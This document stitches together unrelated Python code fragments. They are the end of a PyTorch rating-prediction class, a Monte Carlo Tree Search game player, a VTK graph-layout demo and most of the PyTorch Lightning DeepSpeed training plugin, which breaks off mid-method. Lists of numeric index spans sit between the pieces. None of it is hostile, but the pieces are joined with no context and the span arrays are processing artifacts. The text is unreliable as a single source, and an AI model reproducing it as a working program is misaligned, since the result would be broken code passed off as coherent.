outputs = self.predict(user_item_pairs, batch_size=batch_size).ravel()
loss = np.mean((outputs-ground_truth.ravel())**2)
return loss
def predict(self, user_item_pairs, batch_size=100):
"""
Predict the ratings of the pairs of (user, item).
:param user_item_pairs: list of (user, item)
:param batch_size: batch_size of predicting.
:return: ratings. size=[nb_pairs]
"""
pairs = pd.DataFrame(user_item_pairs)
user_indices = self.users_to_indices(pairs[0].values)
item_indices = self.items_to_indices(pairs[1].values)
self.model.eval()
outputs = []
with torch.no_grad():
start_id = 0
end_id = min(batch_size, len(pairs))
while start_id < len(pairs):
outputs.append(self.predict_on_batch(user_indices[start_id:end_id], item_indices[start_id:end_id]))
start_id += batch_size
end_id = min(start_id+batch_size, len(pairs))
return np.concatenate(outputs, axis=0)
def predict_on_batch(self, user_indices, item_indices):
users = torch.from_numpy(user_indices).long().to(self.device)
items = torch.from_numpy(item_indices).long().to(self.device)
outputs = self.model(users, items)
return outputs.data.cpu().numpy()
def update_history_rating_matrix(self):
"""
Update history rating matrix.
:return: self.
"""
self.history_rating_matrix = pd.DataFrame(index=self.index_2_user, columns=self.index_2_item)
for i, j, k in self.user_item_pairs.values:
if i and j and k:
self.history_rating_matrix[j][i] = k
return self
def update_pred_rating_matrix(self):
"""
Update prediction rating matrix.
:return: self.
"""
pred_matrix = self.model.get_rating_matrix().data.cpu().numpy()
self.pred_rating_matrix = np.where(self.history_rating_matrix.isna(), pred_matrix, np.nan)
return self
# def get_single_rating(self, i, j):
# return self.pred_rating_matrix[i][j] if not np.isnan(self.pred_rating_matrix[i][j])\
# else self.history_rating_matrix.values[i][j]
#
# def predict_ratings_with_matrix(self, user_item_pairs):
# """
# Predict the ratings of the pairs of (user, item).
# :param user_item_pairs: list of (user, item)
# :return: ratings. size=[nb_pairs]
# """
# pairs = pd.DataFrame(user_item_pairs)
# users = self.users_to_indices(pairs[0])
# items = self.items_to_indices(pairs[1])
# return np.array([self.get_single_rating(users[i], items[i]) for i in range(len(user_item_pairs))])
def predict_ratings(self, user_item_pairs):
"""
Predict the ratings of the pairs of (user, item).
:param user_item_pairs: list of (user, item)
:return: ratings. size=[nb_pairs]
"""
return self.predict(user_item_pairs).ravel()
def recommend(self, users, nb_recommendation):
"""
return the recommendations and their corresponding ratings.
:param users: array of users
:param nb_recommendation: The number of items to be recommended.
:return: Indices of recommended items and their corresponding scores.
"""
user_indices = self.users_to_indices(users)
id_recommend, rating_recommend = top_k(np.where(np.isnan(self.pred_rating_matrix[user_indices, :]),
-np.inf, self.pred_rating_matrix[user_indices, :]),
k=nb_recommendation, axis=-1, reverse=True, sort=True)
return id_recommend, rating_recommend
def users_to_indices(self, users):
return np.array([self.user_2_index[user] for user in users]).ravel()
def indices_to_users(self, indices):
return self.index_2_user[np.array(indices).ravel()]
def items_to_indices(self, items):
return np.array([self.item_2_index[item] for item in items]).ravel()
def indices_to_items(self, indices):
return self.index_2_item[np.array(indices).ravel()]
| [
[
[
22,
27
],
[
9186,
9191
]
],
[
[
97,
103
],
[
2881,
2887
]
],
[
[
111,
122
],
[
1539,
1541
],
[
1587,
1589
],
[
5804,
5806
],
[
6748,
6750
],
[
7689,
7691
],
[
7746,
7748
],
[
9192,
9194
],
[
9201,
9203
],
[
9310,
9312
],
[
9564,
9566
],
[
9701,
9703
],
[
9783,
9785
],
[
9920,
9922
]
],
[
[
130,
142
],
[
1441,
1443
],
[
3782,
3784
],
[
6170,
6172
],
[
7233,
7235
]
],
[
[
150,
155
],
[
410,
415
],
[
2063,
2068
],
[
2171,
2176
],
[
2274,
2279
],
[
6384,
6389
],
[
6857,
6862
],
[
6927,
6932
]
],
[
[
174,
176
],
[
438,
440
]
],
[
[
184,
208
],
[
2379,
2383
],
[
2395,
2399
]
],
[
[
226,
230
],
[
4723,
4727
]
],
[
[
239,
258
]
]
] |
import numpy as np
import copy
def softmax(x):
probs = np.exp(x - np.max(x))
probs /= np.sum(probs)
return probs
class TreeNode(object):
"""A node in the MCTS tree. Each node keeps track of its own value Q, prior probability P, and
its visit-count-adjusted prior score u.
"""
def __init__(self, parent, prior_p):
self._parent = parent
self._children = {} # a map from action to TreeNode
self._n_visits = 0
self._Q = 0
self._u = 0
self._P = prior_p
def expand(self, action_priors):
"""Expand tree by creating new children.
action_priors -- output from policy function - a list of tuples of actions
and their prior probability according to the policy function.
"""
for action, prob in action_priors:
if action not in self._children:
self._children[action] = TreeNode(self, prob)
def select(self, c_puct):
"""Select action among children that gives maximum action value, Q plus bonus u(P).
Returns:
A tuple of (action, next_node)
"""
return max(self._children.items(), key=lambda act_node: act_node[1].get_value(c_puct))
def update(self, leaf_value):
"""Update node values from leaf evaluation.
Arguments:
leaf_value -- the value of subtree evaluation from the current player's perspective.
"""
# Count visit.
self._n_visits += 1
# Update Q, a running average of values for all visits.
self._Q += 1.0*(leaf_value - self._Q) / self._n_visits
def update_recursive(self, leaf_value):
"""Like a call to update(), but applied recursively for all ancestors.
"""
# If it is not root, this node's parent should be updated first.
if self._parent:
self._parent.update_recursive(-leaf_value)
self.update(leaf_value)
def get_value(self, c_puct):
"""Calculate and return the value for this node: a combination of leaf evaluations, Q, and
this node's prior adjusted for its visit count, u
c_puct -- a number in (0, inf) controlling the relative impact of values, Q, and
prior probability, P, on this node's score.
"""
self._u = c_puct * self._P * np.sqrt(self._parent._n_visits) / (1 + self._n_visits)
return self._Q + self._u
def is_leaf(self):
"""Check if leaf node (i.e. no nodes below this have been expanded).
"""
return self._children == {}
def is_root(self):
return self._parent is None
class MCTS(object):
"""A simple implementation of Monte Carlo Tree Search.
"""
def __init__(self, policy_value_fn, c_puct=5, n_playout=10000):
"""Arguments:
policy_value_fn -- a function that takes in a board state and outputs a list of (action, probability)
tuples and also a score in [-1, 1] (i.e. the expected value of the end game score from
the current player's perspective) for the current player.
c_puct -- a number in (0, inf) that controls how quickly exploration converges to the
maximum-value policy, where a higher value means relying on the prior more
"""
self._root = TreeNode(None, 1.0)
self._policy = policy_value_fn
self._c_puct = c_puct
self._n_playout = n_playout
def _playout(self, state):
"""Run a single playout from the root to the leaf, getting a value at the leaf and
propagating it back through its parents. State is modified in-place, so a copy must be
provided.
Arguments:
state -- a copy of the state.
"""
node = self._root
while(1):
if node.is_leaf():
break
# Greedily select next move.
action, node = node.select(self._c_puct)
state.do_move(action)
# Evaluate the leaf using a network which outputs a list of (action, probability)
# tuples p and also a score v in [-1, 1] for the current player.
action_probs, leaf_value = self._policy(state)
# Check for end of game.
end, winner = state.game_end()
if not end:
node.expand(action_probs)
else:
# for end state,return the "true" leaf_value
if winner == -1: # tie
leaf_value = 0.0
else:
leaf_value = 1.0 if winner == state.get_current_player() else -1.0
# Update value and visit count of nodes in this traversal.
node.update_recursive(-leaf_value)
def get_move_probs(self, state, temp=1e-3):
"""Runs all playouts sequentially and returns the available actions and their corresponding probabilities
Arguments:
state -- the current state, including both game state and the current player.
temp -- temperature parameter in (0, 1] that controls the level of exploration
Returns:
the available actions and the corresponding probabilities
"""
for n in range(self._n_playout):
state_copy = copy.deepcopy(state)
self._playout(state_copy)
# calc the move probabilities based on the visit counts at the root node
act_visits = [(act, node._n_visits) for act, node in self._root._children.items()]
acts, visits = zip(*act_visits)
act_probs = softmax(1.0/temp * np.log(np.array(visits) + 1e-10))
return acts, act_probs
def update_with_move(self, last_move):
"""Step forward in the tree, keeping everything we already know about the subtree.
"""
if last_move in self._root._children:
self._root = self._root._children[last_move]
self._root._parent = None
else:
self._root = TreeNode(None, 1.0)
def __str__(self):
return "MCTS"
class MCTSPlayer(object):
"""AI player based on MCTS"""
def __init__(self, policy_value_function, c_puct=5, n_playout=2000, is_selfplay=0):
self.mcts = MCTS(policy_value_function, c_puct, n_playout)
self._is_selfplay = is_selfplay
def set_player_ind(self, p):
self.player = p
def reset_player(self):
self.mcts.update_with_move(-1)
def get_action(self, board, temp=1e-3, return_prob=0):
sensible_moves = board.availables
move_probs = np.zeros(board.width*board.height) # the pi vector returned by MCTS as in the alphaGo Zero paper
if len(sensible_moves) > 0:
acts, probs = self.mcts.get_move_probs(board, temp)
move_probs[list(acts)] = probs
if self._is_selfplay:
# add Dirichlet Noise for exploration (needed for self-play training)
move = np.random.choice(acts, p=0.75*probs + 0.25*np.random.dirichlet(0.3*np.ones(len(probs))))
self.mcts.update_with_move(move) # update the root node and reuse the search tree
else:
# with the default temp=1e-3, this is almost equivalent to choosing the move with the highest prob
move = np.random.choice(acts, p=probs)
# reset the root node
self.mcts.update_with_move(-1)
# location = board.move_to_location(move)
# print("AI move: %d,%d\n" % (location[0], location[1]))
if return_prob:
return move, move_probs
else:
return move
else:
print("WARNING: the board is full")
def __str__(self):
return "MCTS {}".format(self.player) | [
[
[
7,
18
],
[
62,
64
],
[
73,
75
],
[
97,
99
],
[
2325,
2327
],
[
5531,
5533
],
[
5538,
5540
],
[
6525,
6527
],
[
6917,
6919
],
[
6960,
6962
],
[
6984,
6986
],
[
7264,
7266
]
],
[
[
26,
30
],
[
5218,
5222
]
],
[
[
38,
45
],
[
5512,
5519
]
],
[
[
135,
143
],
[
915,
923
],
[
3296,
3304
],
[
5940,
5948
]
],
[
[
2630,
2634
],
[
6184,
6188
]
],
[
[
6022,
6032
]
]
] |
#!/usr/bin/env python
from vtk import *
source = vtkRandomGraphSource()
source.SetNumberOfVertices(15)
source.SetStartWithTree(True)
source.SetIncludeEdgeWeights(True)
bfs = vtkBoostBreadthFirstSearch()
bfs.AddInputConnection(source.GetOutputPort())
bfs.SetOriginVertex(0)
view = vtkGraphLayoutView()
view.AddRepresentationFromInputConnection(bfs.GetOutputPort())
view.SetVertexLabelArrayName("BFS")
view.SetVertexLabelVisibility(True)
view.SetVertexColorArrayName("BFS")
view.SetColorVertices(True)
view.SetEdgeColorArrayName("edge weight")
view.SetColorEdges(True)
view.SetLayoutStrategyToSimple2D()
view.SetVertexLabelFontSize(20)
theme = vtkViewTheme.CreateNeonTheme()
theme.SetLineWidth(5)
theme.SetPointSize(10)
view.ApplyViewTheme(theme)
theme.FastDelete()
view.GetRenderWindow().SetSize(600, 600)
view.ResetCamera()
view.Render()
view.GetInteractor().Start()
| [
[
[
39,
40
],
[
53,
73
],
[
184,
210
],
[
295,
313
],
[
669,
681
]
],
[
[
44,
50
],
[
77,
83
],
[
109,
115
],
[
140,
146
],
[
237,
243
]
],
[
[
178,
181
],
[
214,
217
],
[
262,
265
],
[
359,
362
]
],
[
[
288,
292
],
[
317,
321
],
[
381,
385
],
[
418,
422
],
[
455,
459
],
[
492,
496
],
[
521,
525
],
[
564,
568
],
[
590,
594
],
[
626,
630
],
[
748,
752
],
[
800,
804
],
[
842,
846
],
[
862,
866
],
[
879,
883
]
],
[
[
661,
666
],
[
701,
706
],
[
724,
729
],
[
768,
773
],
[
776,
781
]
]
] |
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import contextlib
import json
import logging
import os
import platform
from collections import OrderedDict
from pathlib import Path
from typing import Any, Callable, Dict, Generator, List, Mapping, Optional, Tuple, Union
import torch
from torch.optim import Optimizer
import pytorch_lightning as pl
from pytorch_lightning.overrides.base import _LightningModuleWrapperBase
from pytorch_lightning.plugins.environments.cluster_environment import ClusterEnvironment
from pytorch_lightning.plugins.io.checkpoint_plugin import CheckpointIO
from pytorch_lightning.plugins.training_type.ddp import DDPPlugin
from pytorch_lightning.trainer.optimizers import _get_default_scheduler_config
from pytorch_lightning.trainer.states import TrainerFn
from pytorch_lightning.utilities import AMPType
from pytorch_lightning.utilities.apply_func import apply_to_collection
from pytorch_lightning.utilities.distributed import log, rank_zero_info, rank_zero_only
from pytorch_lightning.utilities.exceptions import MisconfigurationException
from pytorch_lightning.utilities.imports import _DEEPSPEED_AVAILABLE
from pytorch_lightning.utilities.seed import reset_seed
from pytorch_lightning.utilities.types import _PATH, LRSchedulerTypeTuple
from pytorch_lightning.utilities.warnings import rank_zero_warn, WarningCache
warning_cache = WarningCache()
if _DEEPSPEED_AVAILABLE:
import deepspeed
def remove_module_hooks(model: torch.nn.Module) -> None:
# todo (tchaton) awaiting this feature to move upstream to DeepSpeed
for module in model.modules():
module._backward_hooks = OrderedDict()
module._is_full_backward_hook = None
module._forward_hooks = OrderedDict()
module._forward_pre_hooks = OrderedDict()
module._state_dict_hooks = OrderedDict()
module._load_state_dict_pre_hooks = OrderedDict()
class LightningDeepSpeedModule(_LightningModuleWrapperBase):
def __init__(self, pl_module: "pl.LightningModule", precision: int) -> None:
super().__init__(pl_module)
self.precision = precision
def forward(self, *inputs, **kwargs):
if self.precision == 16:
inputs = self._move_float_tensors_to_half(inputs)
return super().forward(*inputs, **kwargs)
@staticmethod
def batch_to(data):
return data.half()
def _move_float_tensors_to_half(self, batch: Any):
batch = apply_to_collection(batch, (torch.FloatTensor, torch.cuda.FloatTensor), function=self.batch_to)
return batch
class DeepSpeedPlugin(DDPPlugin):
distributed_backend = "deepspeed"
DEEPSPEED_ENV_VAR = "PL_DEEPSPEED_CONFIG_PATH"
def __init__(
self,
zero_optimization: bool = True,
stage: int = 2,
remote_device: str = "cpu",
offload_optimizer: bool = False,
offload_parameters: bool = False,
offload_params_device: str = "cpu",
nvme_path: str = "/local_nvme",
params_buffer_count: int = 5,
params_buffer_size: int = 1e8,
max_in_cpu: int = 1e9,
offload_optimizer_device: str = "cpu",
optimizer_buffer_count: int = 4,
block_size: int = 1048576,
queue_depth: int = 8,
single_submit: bool = False,
overlap_events: bool = True,
thread_count: int = 1,
pin_memory: bool = False,
sub_group_size: int = 1e12,
contiguous_gradients: bool = True,
overlap_comm: bool = True,
allgather_partitions: bool = True,
reduce_scatter: bool = True,
allgather_bucket_size: int = 2e8,
reduce_bucket_size: int = 2e8,
zero_allow_untested_optimizer: bool = True,
logging_batch_size_per_gpu: Union[str, int] = "auto",
config: Optional[Union[Path, str, dict]] = None,
logging_level: int = logging.WARN,
num_nodes: Optional[int] = None,
parallel_devices: Optional[List[torch.device]] = None,
cluster_environment: Optional[ClusterEnvironment] = None,
loss_scale: float = 0,
initial_scale_power: int = 16,
loss_scale_window: int = 1000,
hysteresis: int = 2,
min_loss_scale: int = 1,
partition_activations: bool = False,
cpu_checkpointing: bool = False,
contiguous_memory_optimization: bool = False,
synchronize_checkpoint_boundary: bool = False,
load_full_weights: bool = False,
partition_module: bool = True,
) -> None:
"""Provides capabilities to run training using the DeepSpeed library, with training optimizations for large
billion parameter models. `For more information: https://pytorch-
lightning.readthedocs.io/en/latest/advanced/multi_gpu.html#deepspeed`.
.. warning:: ``DeepSpeedPlugin`` is in beta and subject to change.
Defaults have been set to enable ZeRO-Offload and some have been taken from the link below.
These defaults have been set generally, but may require tuning for optimum performance based on your model size.
`For more information: https://www.deepspeed.ai/docs/config-json/#zero-optimizations-for-fp16-training`.
Arguments:
zero_optimization: Enable ZeRO optimization. This is only compatible with precision=16.
stage: Different stages of the ZeRO Optimizer. 0 is disabled,
1 is optimizer state partitioning, 2 is optimizer+gradient state partitioning,
3 is optimizer+gradient_parameter partitioning using the infinity engine.
remote_device: Device to instantiate the model on initially (``cpu`` or ``nvme``).
offload_optimizer: Enable offloading optimizer memory and computation to CPU or NVMe
based on ``offload_optimizer_device``.
offload_parameters: When using ZeRO Stage 3, Enable offloading parameter memory and computation
to CPU or NVMe based on ``offload_params_device``.
offload_params_device: When offloading parameters choose the device to offload to, ``cpu`` or ``nvme``.
offload_optimizer_device: When offloading optimizer state choose the device to offload to,
``cpu`` or ``nvme``.
params_buffer_count: Number of buffers in buffer pool for
parameter offloading when ``offload_params_device`` is ``nvme``.
params_buffer_size: Size of buffers in buffer pool for parameter offloading
when ``offload_params_device`` is ``nvme``.
max_in_cpu: Number of parameter elements to maintain in CPU memory when offloading to NVMe is enabled.
nvme_path: Filesystem path for NVMe device for optimizer/parameter state offloading.
optimizer_buffer_count: Number of buffers in buffer pool for optimizer state offloading
when ``offload_optimizer_device`` is set to to ``nvme``.
This should be at least the number of states maintained per parameter by the optimizer.
For example, Adam optimizer has 4 states (parameter, gradient, momentum, and variance).
block_size: When using NVMe Offloading, the I/O block size in bytes.
queue_depth: When using NVMe Offloading, the I/O queue depth.
single_submit: When using NVMe Offloading,
submit requests to storage device as multiple individual requests,
as opposed to one block of requests.
overlap_events: When using NVMe Offloading,
submit requests to storage device in an overlapped fashion
without waiting for completion of earlier requests.
thread_count: When using NVMe Offloading,
Intra-request parallelism for each read/write submitted by a user thread.
pin_memory: When using ZeRO stage 3, pin optimizer state memory on CPU.
This could boost throughput at the cost of extra memory overhead.
sub_group_size: When using ZeRO stage 3, defines the number of parameters
within a sub group to offload at a time.
Smaller numbers require more communication, but improve memory efficiency.
contiguous_gradients: Copies gradients to a continuous buffer as they are produced.
Avoids memory fragmentation during backwards. Useful when training large models.
overlap_comm: Overlap the reduction (synchronization) of gradients with the backwards computation.
This is a speed optimization when training across multiple GPUs/machines.
allgather_partitions: All gather updated parameters at the end of training step,
instead of using a series of broadcast collectives.
reduce_scatter: Use reduce/scatter instead of allreduce to average gradients.
allgather_bucket_size: Number of elements to allgather at once.
Used to limit the memory required for larger model sizes, with a tradeoff with speed.
reduce_bucket_size: Number of elements to reduce at once.
Used to limit the memory required for larger model sizes, with a tradeoff with speed.
zero_allow_untested_optimizer: Allow untested optimizers to be used with ZeRO. Currently only Adam is a
DeepSpeed supported optimizer when using ZeRO.
logging_batch_size_per_gpu: Config used in DeepSpeed to calculate verbose timing for logging
on a per sample per second basis (only displayed if logging=logging.INFO).
If set to "auto", the plugin tries to infer this from
the train DataLoader's BatchSampler, else defaults to 1.
To obtain accurate logs when using datasets that do not support batch samplers,
set this to the actual per gpu batch size (trainer.batch_size).
config: Pass in a deepspeed formatted config dict,
or path to a deepspeed config: https://www.deepspeed.ai/docs/config-json.
All defaults will be ignored if a config is passed in.
logging_level: Set logging level for deepspeed.
loss_scale: Loss scaling value for FP16 training.
0.0 results in dynamic loss scaling, otherwise static.
initial_scale_power: Power of the initial dynamic loss scale value. Loss scale is computed
by ``2^initial_scale_power``.
loss_scale_window: Window in which to raise/lower the dynamic FP16 loss scaling value.
hysteresis: FP16 Delay shift in Dynamic Loss scaling.
min_loss_scale: The minimum FP16 dynamic loss scaling value.
partition_activations: Enables partition activation when used with ZeRO stage 3 and model parallelism.
Still requires you to wrap your forward functions in deepspeed.checkpointing.checkpoint.
See `deepspeed tutorial
<https://www.deepspeed.ai/tutorials/megatron/#deepspeed-activation-checkpoints-optional>`_.
cpu_checkpointing: Offloads partitioned activations to CPU if ``partition_activations`` is enabled.
contiguous_memory_optimization: Copies partitioned activations so that they are contiguous in memory.
Not supported by all models.
synchronize_checkpoint_boundary: Insert :func:`torch.cuda.synchronize` at each checkpoint boundary.
load_full_weights: True when loading a single checkpoint file containing the model state dict
when using ZeRO Stage 3. This differs from the DeepSpeed checkpoint which contains shards
per worker.
partition_module: When True, partitions the ``LightningModule`` across devices when using ZeRO Stage 3.
This is the default behaviour to ensure that the entire module is appropriately initialized
for DeepSpeed. When False we do not explicitly convert the model, which is fine if NO layers
or ALL layers are defined in ``configure_sharded_model``. This is useful for layers such as
``torch.nn.RNN`` which do internal logic when moving to device.
"""
if not _DEEPSPEED_AVAILABLE:
raise MisconfigurationException(
"To use the DeepSpeed plugin, you must have DeepSpeed installed. pip install deepspeed"
)
super().__init__(
parallel_devices=parallel_devices,
num_nodes=num_nodes,
cluster_environment=cluster_environment,
)
self.config = self._load_config(config)
if self.config is None:
# User has not overridden config, set defaults
self.config = self._create_default_config(
zero_optimization,
zero_allow_untested_optimizer,
logging_batch_size_per_gpu,
offload_optimizer=offload_optimizer,
offload_parameters=offload_parameters,
nvme_path=nvme_path,
offload_params_device=offload_params_device,
params_buffer_count=params_buffer_count,
params_buffer_size=params_buffer_size,
max_in_cpu=max_in_cpu,
pin_memory=pin_memory,
offload_optimizer_device=offload_optimizer_device,
optimizer_buffer_count=optimizer_buffer_count,
block_size=block_size,
queue_depth=queue_depth,
single_submit=single_submit,
overlap_events=overlap_events,
thread_count=thread_count,
partition_activations=partition_activations,
cpu_checkpointing=cpu_checkpointing,
contiguous_memory_optimization=contiguous_memory_optimization,
synchronize_checkpoint_boundary=synchronize_checkpoint_boundary,
stage=stage,
contiguous_gradients=contiguous_gradients,
overlap_comm=overlap_comm,
allgather_partitions=allgather_partitions,
reduce_scatter=reduce_scatter,
allgather_bucket_size=allgather_bucket_size,
reduce_bucket_size=reduce_bucket_size,
sub_group_size=sub_group_size,
)
self._config_initialized = False
deepspeed.utils.logging.logger.setLevel(logging_level)
self.remote_device = remote_device
self.load_full_weights = load_full_weights
self.partition_module = partition_module
# default FP16 parameters.
self.loss_scale = loss_scale
self.initial_scale_power = initial_scale_power
self.loss_scale_window = loss_scale_window
self.hysteresis = hysteresis
self.min_loss_scale = min_loss_scale
def _load_config(self, config):
if config is None and self.DEEPSPEED_ENV_VAR in os.environ:
rank_zero_info(f"Loading DeepSpeed config from set {self.DEEPSPEED_ENV_VAR} environment variable")
config = os.environ[self.DEEPSPEED_ENV_VAR]
if isinstance(config, (str, Path)):
if not os.path.isfile(config):
raise MisconfigurationException(
f"You passed in a path to a DeepSpeed config but the path does not exist: {config}"
)
with open(config) as f:
config = json.load(f)
return config
def setup_distributed(self):
reset_seed()
# determine which process we are and world size
self.set_world_ranks()
self._init_deepspeed_distributed()
if not self._config_initialized:
self._format_config()
self._config_initialized = True
def _init_deepspeed_distributed(self) -> None:
if platform.system() != "Windows":
# do not set env variables on windows, allow deepspeed to control setup
self._set_node_environment_variables()
log.info(
"initializing deepspeed distributed: "
f"GLOBAL_RANK: {self.global_rank}, "
f"MEMBER: {self.global_rank + 1}/{self.world_size}"
)
deepspeed.init_distributed(
self.torch_distributed_backend, distributed_port=self.cluster_environment.master_port()
)
def _set_node_environment_variables(self) -> None:
os.environ["MASTER_ADDR"] = self.cluster_environment.master_address()
os.environ["MASTER_PORT"] = str(self.cluster_environment.master_port())
os.environ["RANK"] = str(self.global_rank)
os.environ["WORLD_SIZE"] = str(self.world_size)
os.environ["LOCAL_RANK"] = str(self.local_rank)
@property
def restore_checkpoint_after_pre_dispatch(self) -> bool:
return True
def pre_dispatch(self):
self.init_deepspeed()
self.barrier()
def init_deepspeed(self):
accumulation_scheduler = self.lightning_module.trainer.accumulation_scheduler
if accumulation_scheduler.epochs != [0]:
raise MisconfigurationException(
"DeepSpeed currently does not support different `accumulate_grad_batches` at different epochs."
)
precision = self.lightning_module.trainer.accelerator.precision
model = LightningDeepSpeedModule(pl_module=self.model, precision=precision)
if self.zero_stage_3 and self.partition_module:
# Ensure the entire model has been moved to the appropriate device
dtype = torch.float16 if self.precision in (16, "mixed") else torch.float32
deepspeed.zero.Init(
module=model, remote_device=self.remote_device, pin_memory=True, config=self.config, dtype=dtype
)
if self.lightning_module.trainer and self.lightning_module.trainer.training:
self._initialize_deepspeed_train(model)
else:
self._initialize_deepspeed_inference(model)
def _init_optimizers(self) -> Tuple[Optimizer, Optional[Union[LRSchedulerTypeTuple]], Optional[int]]:
optimizers, schedulers, optimizer_frequencies = self.lightning_module.trainer.init_optimizers(
self.lightning_module
)
if len(optimizers) > 1 or len(schedulers) > 1:
raise MisconfigurationException(
"DeepSpeed currently only supports single optimizer, single optional scheduler."
)
return (
optimizers[0],
schedulers[0] if schedulers else _get_default_scheduler_config(),
optimizer_frequencies[0] if optimizer_frequencies else None,
)
@property
def zero_stage_3(self) -> bool:
return self.config.get("zero_optimization") and self.config.get("zero_optimization").get("stage") == 3
def _initialize_deepspeed_train(self, model):
if "optimizer" in self.config:
optimizer, lr_scheduler = None, _get_default_scheduler_config()
else:
rank_zero_info(
"You have not specified an optimizer or scheduler within the DeepSpeed config."
"Using `configure_optimizers` to define optimizer and scheduler."
)
optimizer, lr_scheduler, _ = self._init_optimizers()
scheduler = lr_scheduler["scheduler"]
model_parameters = filter(lambda p: p.requires_grad, self.model.parameters())
model, deepspeed_optimizer, _, deepspeed_scheduler = deepspeed.initialize(
config=self.config,
model=model,
model_parameters=model_parameters,
optimizer=optimizer,
lr_scheduler=scheduler,
dist_init_required=False,
)
self._set_deepspeed_activation_checkpointing()
# although we set these here, deepspeed manages the specific optimizer logic
self.lightning_module.trainer.optimizers = [deepspeed_optimizer]
deepspeed_scheduler = model.lr_scheduler
if deepspeed_scheduler is not None:
# disable deepspeed lr scheduling as lightning manages scheduling
model.lr_scheduler = None
lr_scheduler["scheduler"] = deepspeed_scheduler
self.lightning_module.trainer.lr_schedulers = [lr_scheduler]
self.model = model
@contextlib.contextmanager
def model_sharded_context(self) -> Generator[None, None, None]:
if self.zero_stage_3:
assert self._config_initialized
dtype = torch.float16 if self.precision in (16, "mixed") else torch.float32
model_parallel_context = deepspeed.zero.Init(
remote_device=self.remote_device, pin_memory=True, config=self.config, dtype=dtype
)
else:
model_parallel_context = super().model_sharded_context()
with model_parallel_context:
yield
@property
def precision(self) -> Union[str, int]:
return self.lightning_module.trainer.precision
def _set_deepspeed_activation_checkpointing(self):
if self.config.get("activation_checkpointing"):
checkpoint_config = self.config["activation_checkpointing"]
deepspeed.checkpointing.configure(
mpu_=None,
partition_activations=checkpoint_config.get("partition_activations"),
contiguous_checkpointing=checkpoint_config.get("contiguous_checkpointing"),
checkpoint_in_cpu=checkpoint_config.get("checkpoint_in_cpu"),
profile=checkpoint_config.get("profile"),
)
def _initialize_deepspeed_inference(self, model):
# todo: Currently DeepSpeed requires optimizers at inference to partition weights correctly
optimizer, scheduler = None, None
if "optimizer" not in self.config:
rank_zero_info(
"You have not specified an optimizer or scheduler within the DeepSpeed config."
"Using `configure_optimizers` to define optimizer and scheduler."
)
optimizer, lr_scheduler, _ = self._init_optimizers()
scheduler = lr_scheduler["scheduler"]
inference_config = {
# todo: this is required for DeepSpeed throughput timers, or throughput timers will be incorrect
"train_micro_batch_size_per_gpu": 1
}
if "fp16" in self.config:
inference_config.update({"fp16": self.config["fp16"]})
if self.zero_stage_3:
inference_config.update(
{
"zero_allow_untested_optimizer": self.config["zero_allow_untested_optimizer"],
"zero_optimization": self.config["zero_optimization"],
}
)
# Remove all module hooks before initializing new model
remove_module_hooks(model)
model, _, _, _ = deepspeed.initialize(
config=inference_config,
model=model,
optimizer=optimizer,
lr_scheduler=scheduler,
model_parameters=[],
dist_init_required=False,
)
self.model = model
@property
def lightning_module(self):
# the model may not be wrapped with DeepEngine & LightningDeepSpeedModule if calling this too early
module = getattr(self.model, "module", self.model)
return module.module if isinstance(module, LightningDeepSpeedModule) else module
@property
def distributed_sampler_kwargs(self):
distributed_sampler_kwargs = dict(num_replicas=self.world_size, rank=self.global_rank)
return distributed_sampler_kwargs
def init_optimizers(self, trainer: "pl.Trainer", model: "pl.LightningModule") -> Tuple[List, List, List]:
# Skip initializing optimizers here as DeepSpeed handles optimizers via config.
# User may have specified config options instead in configure_optimizers, but this is handled
# via `_initialize_deepspeed_train`
return [], [], [] # empty optimizers, schedulers and frequencies
def optimizer_step(self, optimizer: torch.optim.Optimizer, lambda_closure: Callable, **kwargs):
# note: We rely on the deepspeed engine to carry out the step rather than the optimizer.
# internally, the engine has a reference to the optimizer already.
self.model.step(**kwargs)
@property
def handles_gradient_accumulation(self) -> bool:
"""Whether the plugin handles gradient accumulation internally."""
return True
def _format_config(self):
if self.config is None:
raise MisconfigurationException(
"To use DeepSpeed you must pass in a DeepSpeed config dict, or a path to a JSON config."
" See: https://pytorch-lightning.readthedocs.io/en/latest/advanced/multi_gpu.html#deepspeed"
)
self._format_batch_size_and_grad_accum_config()
self._format_precision_config()
def _format_batch_size_and_grad_accum_config(self):
if "gradient_accumulation_steps" in self.config:
raise MisconfigurationException(
"Do not set `gradient_accumulation_steps` in the DeepSpeed config"
" as this will be set with the `accumulate_grad_batches` argument passed via the Lightning Trainer."
)
self.config["gradient_accumulation_steps"] = self.lightning_module.trainer.accumulate_grad_batches
if "train_micro_batch_size_per_gpu" not in self.config:
rank_zero_warn(
"Inferring the batch size for internal deepspeed logging from the `train_dataloader()`. "
"If you require skipping this, please pass "
"`Trainer(plugins=DeepSpeedPlugin(logging_batch_size_per_gpu=batch_size))`"
)
batch_size = self._auto_select_batch_size()
self.config["train_micro_batch_size_per_gpu"] = batch_size
if "gradient_clipping" not in self.config:
self.config["gradient_clipping"] = self.lightning_module.trainer.gradient_clip_val
def _auto_select_batch_size(self):
# train_micro_batch_size_per_gpu is used for throughput logging purposes
# by default we try to use the batch size of the loader
batch_size = 1
if hasattr(self.lightning_module, "train_dataloader"):
train_dataloader = self.lightning_module.train_dataloader()
if hasattr(train_dataloader, "batch_sampler"):
batch_size = train_dataloader.batch_sampler.batch_size
return batch_size
def _format_precision_config(self):
amp_type = self.lightning_module.trainer.accelerator_connector.amp_type
amp_level = self.lightning_module.trainer.accelerator_connector.amp_level
precision = self.lightning_module.trainer.accelerator_connector.precision
if precision in (16, "mixed"):
if "fp16" not in self.config and amp_type == AMPType.NATIVE:
# FP16 is a DeepSpeed standalone AMP implementation
rank_zero_info("Enabling DeepSpeed FP16.")
self.config["fp16"] = {
"enabled": True,
"loss_scale": self.loss_scale,
"initial_scale_power": self.initial_scale_power,
"loss_scale_window": self.loss_scale_window,
"hysteresis": self.hysteresis,
"min_loss_scale": self.min_loss_scale,
}
elif "amp" not in self.config and amp_type == AMPType.APEX:
rank_zero_only("Enabling DeepSpeed APEX Implementation.")
self.config["amp"] = {"enabled": True, "opt_level": amp_level}
def _create_default_config(
self,
